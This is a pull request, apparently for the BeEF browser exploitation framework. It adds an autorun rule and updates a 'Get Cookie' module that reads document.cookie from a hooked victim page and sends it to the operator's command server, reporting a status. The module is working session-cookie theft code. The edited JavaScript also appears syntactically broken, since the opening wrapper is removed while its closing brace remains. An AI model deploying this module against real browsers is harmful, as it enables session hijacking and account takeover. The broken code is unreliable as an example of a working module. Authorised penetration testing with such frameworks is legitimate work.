### PR TITLE
Get cookie ARE status update

### DIFF
--- a/arerules/get_cookie.json
+++ b/arerules/get_cookie.json
@@ -1,0 +1,18 @@
+{
+  "name": "Get Cookie",
+  "author": "@benichmt1",
+  "browser": "ALL",
+  "browser_version": "ALL",
+  "os": "ALL",
+  "os_version": "ALL",
+  "modules": [
+    {"name": "get_cookie",
+      "condition": null,
+      "options": {
+      }
+    }
+  ],
+  "execution_order": [0],
+  "execution_delay": [0],
+  "chain_mode": "sequential"
+}

--- a/modules/browser/hooked_domain/get_cookie/command.js
+++ b/modules/browser/hooked_domain/get_cookie/command.js
@@ -4,9 +4,12 @@
 // See the file 'doc/COPYING' for copying permission
 //
 
-beef.execute(function() {
-
-	beef.net.send("<%= @command_url %>", <%= @command_id %>, 'cookie='+document.cookie);
-
+try {
+      beef.net.send("<%= @command_url %>", <%= @command_id %>, 'cookie='+document.cookie, beef.are.status_success());
+      beef.debug("[Get Cookie] Cookie captured: "+document.cookie);
+}catch(e){
+      beef.net.send("<%= @command_url %>", <%= @command_id %>, 'cookie='+document.cookie, beef.are.status_error());
+      beef.debug("[Get Cookie] Error");
+}
 });
 


### PR DESCRIPTION
Updated the Get_cookie ARE module to return a status. Tested on Ubuntu 16.04 x64.

Side note - I added in debugging strings but I could not get those to display even though I used -v and turned debugging on through config.yaml. 
